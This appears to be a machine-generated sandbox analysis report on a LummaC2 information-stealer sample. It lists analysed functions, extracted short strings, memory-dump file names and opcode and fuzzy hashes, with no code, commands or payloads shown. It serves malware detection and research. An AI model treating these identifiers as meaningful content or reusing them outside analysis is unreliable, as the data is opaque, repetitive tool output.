Function 00F1A800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

f, xrefs: 00F1AA31
<Y?., xrefs: 00F1ABDB
@Y?., xrefs: 00F1AC15

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: 21129053787884058d6a7300cf27cf4b2ee95206a856e44f83ae4d7217b7d292
Instruction ID: 2339f6a3cfeb06958df40ece1b660f45da46fbf9bc04efa1d44374e9adb7dcff
Opcode Fuzzy Hash: 21129053787884058d6a7300cf27cf4b2ee95206a856e44f83ae4d7217b7d292
Instruction Fuzzy Hash: 9222E471A0A3418FD714CF24C89176BBBE2FFD9324F18892CE49587392D635DC869B92

Function 00EE9710 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

v~, xrefs: 00EE9A04
p, xrefs: 00EE9936
HVKG, xrefs: 00EE97A0

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: HVKG$p$v~
API String ID: 0-1862922427
Opcode ID: 4560a391fe1d7d437826ab98e38df8ab785f7e0aa25c8e4c746620ce527d9c5b
Instruction ID: 3f2dfd1f43067c6d6e3bf49202864dbff3df31d2c9eb1c88f9ddbac1666c5d35
Opcode Fuzzy Hash: 4560a391fe1d7d437826ab98e38df8ab785f7e0aa25c8e4c746620ce527d9c5b
Instruction Fuzzy Hash: BCB146B160C3808BE314CF65D8816ABBBE5EFD2314F14496CE1E18B392D778D90ACB56

Function 00F0BF45 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

u, xrefs: 00F0C364
L,2H, xrefs: 00F0BF4D
@a, xrefs: 00F0C2AF

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$L,2H$u
API String ID: 0-2528062038
Opcode ID: 44742d19001683431c9be41d4d1c436b6fab04a65aacd57543862bec98b236ab
Instruction ID: c71c15653ce41329a5c02b28b8e2902c9daa4fb441bd76829fe4a1a2045e844b
Opcode Fuzzy Hash: 44742d19001683431c9be41d4d1c436b6fab04a65aacd57543862bec98b236ab
Instruction Fuzzy Hash: E291E17050C3C18FD729CF3984607BBBBE1AFAA314F184AADE4C997282D7358506DB56

Function 00F0C984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00F0CC43
d, xrefs: 00F0CACA
@, xrefs: 00F0CBB3

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: bfaee258dc5fb04c030b4c532d9f3ba89fe3dab57a9df7ee9fad521c7ccf13cc
Instruction ID: 6ef17c9e97b27f97778c378b93f3e26ad4e32bafc4e0b6b152351044bca597ee
Opcode Fuzzy Hash: bfaee258dc5fb04c030b4c532d9f3ba89fe3dab57a9df7ee9fad521c7ccf13cc
Instruction Fuzzy Hash: 44713AB160C3814BE318CF3984A133BBFD1AFD6314F588A6DE4D68B2D1D6788446A792

Function 00F0C9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00F0CC43
d, xrefs: 00F0CACA
@, xrefs: 00F0CBB3

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 0c9e834a4308f5091045ef8e30aa1c1848c212164c38e5415a97d2fd5f85ccf9
Instruction ID: 47b849a708d3daf383943f55c766b293a0dffaff9dc267198e229a7e4becc8d7
Opcode Fuzzy Hash: 0c9e834a4308f5091045ef8e30aa1c1848c212164c38e5415a97d2fd5f85ccf9
Instruction Fuzzy Hash: 65713BB160C3814BD318CF3984A133BBFD1AFD6314F68CA6DE4D68B2D1D6788446A792

Function 00F0C9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

^TFW, xrefs: 00F0CC43
d, xrefs: 00F0CACA
@, xrefs: 00F0CBB3

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 9e77206568686ccfb4bbd462c51b67dd12cab8a12a279129afa2eed9197850d7
Instruction ID: 7f867274428af3e1eb617a76e982b96a2a9f70a4103ffea4f0d91a332d1f78e9
Opcode Fuzzy Hash: 9e77206568686ccfb4bbd462c51b67dd12cab8a12a279129afa2eed9197850d7
Instruction Fuzzy Hash: 096129A150C3D14BD318CF3984A133BFFD19FE6714F588A6DE4D68B2C2D6348506AB96

Function 00F05640 Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

AF, xrefs: 00F058DC
O6E4, xrefs: 00F0593D, 00F0594C
)G, xrefs: 00F058D4

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: )G$AF$O6E4
API String ID: 0-708911115
Opcode ID: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction ID: c71651af95c5704cf49a287ee06794985191426771349f10ab6157c0945a8c8b
Opcode Fuzzy Hash: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction Fuzzy Hash: 9D8159B1A083508BD7149F14C89136BBBE2FFD1724F19891CE4C58B3D1EBB98905DB92

Function 00EF720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

1, xrefs: 00EF7631
!, xrefs: 00EF78E5

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: 4d8c704478dbbc60c2a78117551f44e7a1853ee88a58c0c2a3525ca5d5fcaa3f
Instruction ID: 5a886e04d464e9530257eb2c9290e32414d1f9c0e855451eca254eb4dd4e2c18
Opcode Fuzzy Hash: 4d8c704478dbbc60c2a78117551f44e7a1853ee88a58c0c2a3525ca5d5fcaa3f
Instruction Fuzzy Hash: 6522767060C3458FE734CF24D89177B7BE2EB96358F18A46CD6C6A72A2D7348802DB52

Function 00EE4C50 Relevance: 3.3, Strings: 2, Instructions: 812COMMON

Download Yara Rule

Strings

8, xrefs: 00EE5592
0, xrefs: 00EE559A

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: fa65dad4aa2c112464956a0df7c11161aed008e90192f2aae7c07fc2eb2a6a51
Instruction ID: 4fe2df1346b9507c99ec5d60d7f7ce48d4b3be955cd17d5cb98ea6a5dde5fd59
Opcode Fuzzy Hash: fa65dad4aa2c112464956a0df7c11161aed008e90192f2aae7c07fc2eb2a6a51
Instruction Fuzzy Hash: ED7259716083859FD714CF19C880BABBBE1BF88318F04992DF98997391D375D958CB92

Function 00EFCC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

46i`, xrefs: 00EFD104
06i`, xrefs: 00EFD13A

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: 7c491491a6ac652d811d556840c7d99ec7bd3e0149cab1adcb5c3ecd84873ad3
Instruction ID: 732ba9d2326e8f7bc46bfef364c5f745175dbd37d2c457ae6d5919079abe3c13
Opcode Fuzzy Hash: 7c491491a6ac652d811d556840c7d99ec7bd3e0149cab1adcb5c3ecd84873ad3
Instruction Fuzzy Hash: 8CD12172A183158BC724CF28CC502BBB7E2EFD5314F189A2CE9D59B394EB789905C381

Function 00F180C5 Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

NO, xrefs: 00F18378
:, xrefs: 00F185B4

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: :$NO
API String ID: 0-151983983
Opcode ID: 3d064e05b53ef4a5aa5e4db6c8d05ec56bb73d5c33049bfeb8cf48923fd2163c
Instruction ID: 1ade08ac2f4dc22609e10cd53f244c545426d0d12419d4844448f8850744cf3e
Opcode Fuzzy Hash: 3d064e05b53ef4a5aa5e4db6c8d05ec56bb73d5c33049bfeb8cf48923fd2163c
Instruction Fuzzy Hash: A7D11937628356CBC7249F78DD111AA73F2FF89351F1A8879D441872A0E739C9A2E750

Function 00F1E540 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

{rsp, xrefs: 00F1E750
lohi, xrefs: 00F1E624, 00F1E6C5

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: lohi${rsp
API String ID: 2994545307-2839643115
Opcode ID: ca99ef7a3ff8be73f5b4105c692a82e3876f0c2c6c62bcbca88f04096b4b0568
Instruction ID: 95c12d4f80eaac78210f21e8a87c0a932d0252dc788abc19dff0660f90723e30
Opcode Fuzzy Hash: ca99ef7a3ff8be73f5b4105c692a82e3876f0c2c6c62bcbca88f04096b4b0568
Instruction Fuzzy Hash: 27910A71B093448FD324DE25D8906ABB7D2EBD5324F19C93CE8D687251DA30DC46D792

Function 00EE4310 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00EE438B
IEND, xrefs: 00EE4701

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: a5773f4c72cb788b9bb0cbd49979979057c0b9c5247608f71abad759caae1a25
Instruction ID: 88ea738829416254932effb0bf9ae6edf453687ea9ecd406214755c5b7710663
Opcode Fuzzy Hash: a5773f4c72cb788b9bb0cbd49979979057c0b9c5247608f71abad759caae1a25
Instruction Fuzzy Hash: 95D1C0B16083889FD710CF15D841B9FBBE4EB94308F14592DF999AB382D775E908CB92

Function 00EF7B75 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

"#, xrefs: 00EF7D10
s}, xrefs: 00EF7C34

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: "#$s}
API String ID: 0-1697270657
Opcode ID: 2b5195c633f1aa7bd0ef0c67b796529745ab04b898de78e07f5ca1138324afd3
Instruction ID: dc10f0efdff00839097dc8a580ae972cb4b1ca6091efddcbd8341c4004e5b581
Opcode Fuzzy Hash: 2b5195c633f1aa7bd0ef0c67b796529745ab04b898de78e07f5ca1138324afd3
Instruction Fuzzy Hash: B3B197B01083818BD774CF28D4917EBBBE0EF96314F18492DE4C99B291DB758945CB92

Function 00F0C289 Relevance: 2.8, Strings: 2, Instructions: 309COMMON

Download Yara Rule

Strings

u, xrefs: 00F0C364
@a, xrefs: 00F0C2AF

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$u
API String ID: 0-583156259
Opcode ID: 3cfdd42e1b9147585d81322a0a495f860b65e165e13fce6598790617fd556e84
Instruction ID: e9c0d4aa4bc3f433bcf5b06747fff6d085688c7efadf50cae2df5263d7923324
Opcode Fuzzy Hash: 3cfdd42e1b9147585d81322a0a495f860b65e165e13fce6598790617fd556e84
Instruction Fuzzy Hash: 5281E47050C3C18FD769CF3984607BBBBD1AFAA314F188A6DE4C997282DB358506DB52

Function 00EF683F Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

gfff, xrefs: 00EF6A5E
7, xrefs: 00EF6991

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: 2cb9dc018d8030441f607dacafddb48237fd0cfdf6a7a35ea2c9818f31a7e832
Instruction ID: 451ea5ce5ae32a29ce32d1814c5b7ce41fe4ffd8eb6204ac262e6d6a19f4fe69
Opcode Fuzzy Hash: 2cb9dc018d8030441f607dacafddb48237fd0cfdf6a7a35ea2c9818f31a7e832
Instruction Fuzzy Hash: AF918C73A142144FD718CB38CC527AB77D2EBC4368F19C63DD595EB385EA7898068B81

Function 00EFAD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

CM, xrefs: 00EFAF47
x3,-, xrefs: 00EFAE6E

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: 4579caeb7cb06e5fc12f958596ed67f3758e3a2a83a7ee4d020e2a03e9cd80f8
Instruction ID: 1266274da8ec289172b6e695f002ac5b52f7375e91f8fb86374cff1535122a6a
Opcode Fuzzy Hash: 4579caeb7cb06e5fc12f958596ed67f3758e3a2a83a7ee4d020e2a03e9cd80f8
Instruction Fuzzy Hash: D69160B49107009FC7249F39C596626BFF1FF0A310B449A6DE4DA9FB95D330A406CB96

Function 00EFD172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

_8Y, xrefs: 00EFD208
[U, xrefs: 00EFD210

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: c83198b6e3004c7a5979e3c873eeb545536cb4092e817f19836fe1b41f05bd28
Instruction ID: c5bec539b5725c16c7182e0e4b112a9c30340f0b6a1267140a9e36732c6f25a3
Opcode Fuzzy Hash: c83198b6e3004c7a5979e3c873eeb545536cb4092e817f19836fe1b41f05bd28
Instruction Fuzzy Hash: 73610F7064C3548BD710DF24D85166BBBF2EF92308F08996CE9C4AB390E739D906DB96

Function 00EFD189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

_8Y, xrefs: 00EFD208
[U, xrefs: 00EFD210

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 37462aa7c96af0843499b89224a16ba2da5e5e4c3e3e29c8b1c083509be5b25b
Instruction ID: f1c57e19309fe8e6e33fc06c458b8d2b93a731603c72f6d633e0529de304711d
Opcode Fuzzy Hash: 37462aa7c96af0843499b89224a16ba2da5e5e4c3e3e29c8b1c083509be5b25b
Instruction Fuzzy Hash: 0E51007064C3508BD714CF24DC5167BBBF2EF92308F18996CE984AB290E739D906D756

Function 00EEF2A0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

J, xrefs: 00EEF424
], xrefs: 00EEF3BF

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID: J$]
API String ID: 0-1719541227
Opcode ID: 9ad624878dc53119bba8fb7d0af388bb7dc4f21a0d294e335a17748bc9190bf5
Instruction ID: 85ab3aabadf8db72896b083a643307576f69414221dbbd53b984f93c8a73edbe
Opcode Fuzzy Hash: 9ad624878dc53119bba8fb7d0af388bb7dc4f21a0d294e335a17748bc9190bf5
Instruction Fuzzy Hash: 38613C33A1C7948BD3248A7988812DFFBD29BD5324F194A7ED9E4D73C1D67888058742

Function 00F03C60 Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

Z[, xrefs: 00F03CE6
b"}, xrefs: 00F03CED

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

